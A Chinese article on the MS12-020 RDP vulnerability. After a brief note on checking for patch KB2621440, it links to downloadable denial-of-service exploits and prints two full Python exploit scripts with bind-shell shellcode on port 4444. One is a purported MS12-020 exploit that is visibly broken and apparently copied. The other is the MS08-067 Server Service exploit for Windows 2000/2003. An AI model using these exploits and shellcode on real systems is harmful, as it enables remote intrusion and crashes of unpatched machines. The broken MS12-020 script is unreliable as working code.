关于MS12-020 3389 0day exp 远程桌面执行代码漏洞的文章

Luigi Auriemma 与 TippingPoint's、Zero Day Initiative 合作报告了远程桌面协议漏洞 (CVE-2012-0002)

如何检查自己是否已安装更新补丁?

这个漏洞的更新补丁号为:KB2621440,用户可以自行在:控制面板 --> 添加删除程序(记得勾选“显示更新,然后查找该编号,如果有则表示您已安装,可以不必担心了,或者使用命令:systeminfo

在显示出来的更新补丁列表中查找该编号,或者干脆使用命令查找,例如:systeminfo|find /i "KB2621440"

强烈推荐大家开启自动更新并设置为自动下载并安装

 

MS12-020 3389 0day exp 远程桌面执行代码漏洞



ms12-020  <--EXE版蓝屏攻击,命令格式IP+port

EXP 1 :http://www.sitedirsec.com/exp/ms12-020.rar



MS12-020_py <--Python版本蓝屏攻击,命令格式iP,端口自己在代码里面改

EXP2 :http://www.sitedirsec.com/exp/MS12-020_py.rar


MS12-020_ruby <--Ruby版本蓝屏攻击,无环境未测试
 

EXP3 :http://www.sitedirsec.com/exp/MS12-020_ruby.rar

 

        网上流传的MS12-020 远程桌面(RDP)远程执行代码漏洞 的PY代码都说是假的,是以前的。其实该PY代码跟08年的及其相似,如下:

MS12-020 Exp,MS12-020.exe,MS12-020 漏洞利用程序

需要安装 FREERDP

这个貌似就是大家苦苦寻找的 ms12-020 exp

下载地址:http://115.com/file/anmgwyzh

视频地址:http://good.gd/1975261.htm

FREERDP 模块:https://github.com/FreeRDP/FreeRDP/downloads

这是网上流传的 ms12-020 exp py 版本代码:

#!/usr/bin/env python##############################################################################   MS12-020 Exploi##   Uses FreeRDP#############################################################################import struct import sys from freerdp import rdpRdp from freerdp import crypto from freerdp.rdpRdp import  rdpNego  #bind shellcode TCP port 4444 shellcode  = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90' shellcode += '\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9' shellcode += '\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56' shellcode += '\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22' shellcode += '\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30' shellcode += '\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81' shellcode += '\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42' shellcode += '\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22' shellcode += '\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9' shellcode += '\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79' shellcode += '\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab' shellcode += '\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa' shellcode += '\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48' shellcode += '\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1' shellcode += '\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0' shellcode += '\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe' shellcode += '\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9' shellcode += '\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84' shellcode += '\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56' shellcode += '\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8' shellcode += '\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79' shellcode += '\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6' shellcode += '\xba\xb5\x60\x56\x39\x4a\xb6\xa9'#Payload payload  = '\x41\x00\x5c\x00' payload += '\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49' payload += '\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68' payload += '\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32' payload += '\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43' payload += '\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71' payload += '\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c' payload += '\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74' payload += '\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66' payload += '\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c' payload += '\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b' payload += '\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79' payload += '\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54' payload += '\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36' payload += '\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30' payload += '\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66' payload += '\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73' payload += '\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b' payload += '\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63' payload += '\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a' payload += '\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f' payload += '\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73' payload += '\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c' payload += '\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70' payload += '\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61' payload += '\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33' payload += '\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32' payload += '\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e' payload += '\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39' payload += '\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39' payload += '\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e' payload += '\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e' payload += '\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51' payload += '\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64' payload += '\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37' payload += '\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70' payload += '\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e' payload += '\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73' payload += '\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61' payload += '\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78' payload += '\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e' payload += '\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30' payload += '\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b' payload += '\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b' payload += '\x4f\x69\x46\x4b\x4f\x6e\x30\x68';class SRVSVC_Exploit(Thread):     def __init__(self, target, port=3389):         super(SRVSVC_Exploit, self).__init__()         self.__port   = port         self.target   = target      def __DCEPacket(self):         print '[-]Connecting'         self.__trans = rdp.transport.cert('rdp_np:%s\\x00\\x89]' % self.target)         self.__trans.connect()         print '[-]connected' % self.target          # Making teh packet         self.__stub='\x01\x00\x00\x00'         self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'         self.__stub+=shellcode         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'         self.__stub+='\x00\x00\x00\x00'         self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'         self.__stub+=payload         self.__stub+='\x00\x00\x00\x00'         self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'         self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'         self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'         self.__stub+='\x01\x00\x00\x00\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3'         return      def run(self):         self.__DCEPacket()         self.__dce.call(0x1f, self.__stub)         print '[-]Exploit successfull!...\nTelnet to port 4444 on target machine.'if __name__ == '__main__':       	target = sys.argv[1]       	print '\nUsage: %s <target ip> \n' % sys.argv[0]         sys.exit(-1)  current = SRVSVC_Exploit(target) current.start()

这是 2008 年的那个漏洞 Py 代码,目测二者极其相似,MS Windows Server Service Code Execution Exploit (MS08-067):

==================================================================== MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3)====================================================================#!/usr/bin/env python##############################################################################   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)#   www.hackingspirits.com#   www.coffeeandsecurity.com#   Email: d3basis.m0hanty @ gmail.com#############################################################################import struct import sys  from threading import Thread    #Thread is imported incase you would like to modify                                 #the src to run against multiple targets.try:     from impacket import smb     from impacket import uuid     from impacket.dcerpc import dcerpc     from impacket.dcerpc import transport except ImportError, _:     print 'Install the following library to make this script work'     print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'     print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'     sys.exit(1)print '#######################################################################'print '#   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'print '#   www.hackingspirits.com'print '#   www.coffeeandsecurity.com'print '#   Email: d3basis.m0hanty @ gmail.com'print '#######################################################################\n'#Portbind shellcode from metasploit; Binds port to TCP port 4444 shellcode  = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9" shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56" shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22" shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30" shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81" shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42" shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22" shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9" shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79" shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab" shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa" shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48" shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1" shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0" shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe" shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9" shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84" shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56" shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8" shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79" shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6" shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"#Payload for Windows 2000 target payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00' payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41' payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41' payload_1+='\x41\x41' payload_1+='\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0' payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43' payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43' payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43' payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43' payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43' payload_1+='\xeb\xcc' payload_1+='\x00\x00'#Payload for Windows 2003[SP2] target payload_2='\x41\x00\x5c\x00' payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00' payload_2+='\x2e\x00\x5c\x00\x0a\x32\xbb\x77' payload_2+='\x8b\xc4\x66\x05\x60\x04\x8b\x00' payload_2+='\x50\xff\xd6\xff\xe0\x42\x84\xae' payload_2+='\xbb\x77\xff\xff\xff\xff\x01\x00' payload_2+='\x01\x00\x01\x00\x01\x00\x43\x43' payload_2+='\x43\x43\x37\x48\xbb\x77\xf5\xff' payload_2+='\xff\xff\xd1\x29\xbc\x77\xf4\x75' payload_2+='\xbd\x77\x44\x44\x44\x44\x9e\xf5' payload_2+='\xbb\x77\x54\x13\xbf\x77\x37\xc6' payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00'if sys.argv[2]=='1':    #Windows 2000 Payload     payload=payload_1     print '[-]Windows 2000 payload loaded'if sys.argv[2]=='2':    #Windows 2003[SP2] Payload     payload=payload_2     print '[-]Windows 2003[SP2] payload loaded'class SRVSVC_Exploit(Thread):     def __init__(self, target, osver, port=445):         super(SRVSVC_Exploit, self).__init__()         self.__port   = port         self.target   = target         self.osver   = osver      def __DCEPacket(self):         print '[-]Initiating connection'         self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)         self.__trans.connect()         print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target         self.__dce = self.__trans.DCERPC_class(self.__trans)         self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))                  # Constructing Malicious Packet         self.__stub='\x01\x00\x00\x00'         self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'         self.__stub+=shellcode         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'         self.__stub+='\x00\x00\x00\x00'         self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'         self.__stub+=payload         self.__stub+='\x00\x00\x00\x00'         self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'         self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'         self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'         self.__stub+='\x01\x00\x00\x00'         return      def run(self):         self.__DCEPacket()         self.__dce.call(0x1f, self.__stub)   #0x1f (or 31)- NetPathCanonicalize Operation         print '[-]Exploit sent to target successfully...\n[1]Telnet to port 4444 on target machine...'if __name__ == '__main__':        try:                target = sys.argv[1]                osver = sys.argv[2]        except IndexError:                print '\nUsage: %s <target ip> <os version>\n' % sys.argv[0]                print 'Example: srvsvcexpl.py 192.168.1.1 2\n'                print 'Select OS Version'                print '[-]Windows 2000: OS Version = 1'                print '[-]Windows 2003[SP2]: OS Version = 2'                 sys.exit(-1)  current = SRVSVC_Exploit(target, osver) current.start()#print '[-]Exploit sent to target successfully...\n[-]Telnet to port 4444 on target machine...'# 1337day.com [2008-11-16]

你可能感兴趣的:(职场,exp,休闲,3389,0day,MS12-020,远程桌面执行代码漏洞)